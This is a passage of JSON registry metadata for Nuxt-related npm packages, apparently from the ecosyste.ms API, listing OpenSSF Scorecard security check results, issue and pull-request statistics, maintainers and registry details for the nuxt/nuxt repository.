score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.112Z","dependent_packages_count":0,"downloads":825,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.881346129003017,"dependent_packages_count":35.91910181813241,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.400223973567712},"purl":"pkg:npm/%40nuxt/docs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/docs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/docs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/docs/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-12T12:00:21.939Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":804,"past_year_pull_requests_count":1345,"past_year_avg_time_to_close_issue":667153.5734265734,"past_year_avg_time_to_close_pull_request":227084.4248046875,"past_year_issues_closed_count":429,"past_year_pull_requests_closed_count":1024,"past_year_pull_request_authors_count":125,"past_year_issue_authors_count":586,"past_year_avg_comments_per_issue":2.1965174129353233,"past_year_avg_comments_per_pull_request":3.3219330855018585,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":539,"past_year_merged_pull_requests_count":909,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":265,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fdocs/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2025-04-03T16:02:38.456Z","updated_at":"2025-04-03T16:02:38.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":14074780,"name":"@depup/nuxt__kit","ecosystem":"npm","description":"[DepUp] Toolkit for authoring modules and interacting with Nuxt","homepage":"https://nuxt.com/docs/4.x/api/kit","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["depup","dependency-bumped","updated-deps","@nuxt/kit"],"namespace":"depup","versions_count":1,"first_release_published_at":"2026-03-17T16:32:56.815Z","latest_release_published_at":"2026-03-17T16:32:56.815Z","latest_release_number":"4.4.2-depup.0","last_synced_at":"2026-05-11T01:23:03.950Z","created_at":"2026-03-19T04:23:01.503Z","updated_at":"2026-05-11T01:23:03.951Z","registry_url":"https://www.npmjs.com/package/@depup/nuxt__kit","install_command":"npm install @depup/nuxt__kit","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.4.2-depup.0"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses 